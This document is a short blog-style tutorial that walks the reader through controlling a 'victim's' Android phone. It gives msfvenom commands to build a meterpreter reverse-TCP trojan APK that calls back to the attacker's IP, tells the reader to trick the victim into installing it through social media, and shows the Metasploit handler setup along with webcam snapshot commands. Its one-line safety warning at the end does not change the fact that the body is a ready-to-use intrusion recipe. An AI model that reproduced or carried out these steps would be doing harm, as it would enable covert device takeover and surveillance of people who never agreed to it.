We are all aware of how android has influenced the world. As it became a revolution, along with its pros it also comes with cons. In this post, I will be demonstrating how malicious hackers exploit the android phone and control the device with their system. So, let's start.
Prerequisite:
1. msfvenom
2. Metasploit
Fire up your terminal and just follow these steps to control your victim's android phone.
STEP 1. Create a payload using msfvenom:
$ msfvenom -p android/meterpreter/reverse_tcp LHOST=[YOUR PRIVATE IP] LPORT=[YOUR PORT] R > /Desktop/trojan.apk
-p : payload
LHOST : IP address of your own PC
LPORT : Any port > 1024
I got you..! But how to get my IP address ? Yes wait!!!!
$ ifconfig | grep -w inet | awk '{print $2}'
OR
$ /sbin/ifconfig | grep -w inet | awk '{print $2}'
After creating payload you will get a file called trojan.apk in /Desktop path. Send this file to the victim using any social media and let them to install it.
STEP 2. Open metasploit and hack
To start metasploit use this command
msfconsole
When you get metasploit shell follow these commands.
$ use exploit/multi/handler
$ set payload android/meterpreter/reverse_tcp
$ set LHOST <YOUR IP USED in the previous command>
$ set LPORT <PORT Specified in the previous command>
$ show options
*remove <> while executing the above commands.
Your are just 1 step away from gaining access to your victim's phone.
$ exploit
Once the victim installs the trojan.apk in his phone you will get a reverse shell (ie., meterpreter shell. It is as good as you are getting accessing to all the files on victim's cellphone.)
Once you get meterpreter, you can do all sort of things.
webcam_list
- The webcam_list command shows a list of webcams you could use for the webcam_snap command. Example:
meterpreter > webcam_list
1: Back Camera
2: Front Camera
webcam_snap
- The webcam_snap command takes a picture from the device. You will have to use the webcam_list command to figure out which camera to use. Example:
meterpreter > webcam_snap -i 2
[*] Starting...
[+] Got frame
[*] Stopped
Webcam shot saved to: /Users/user/rapid7/msf/uFWJXeQt.jpeg
Finally, you have access to your victim's cell phone. This post's main idea was to explain how malware would be injected into android cell phone without knowledge of the user and being monitored by malicious people. So, the final words of this post is that do not install unknown apps to your cell phones, Be safe! cheers!
Top comments (0)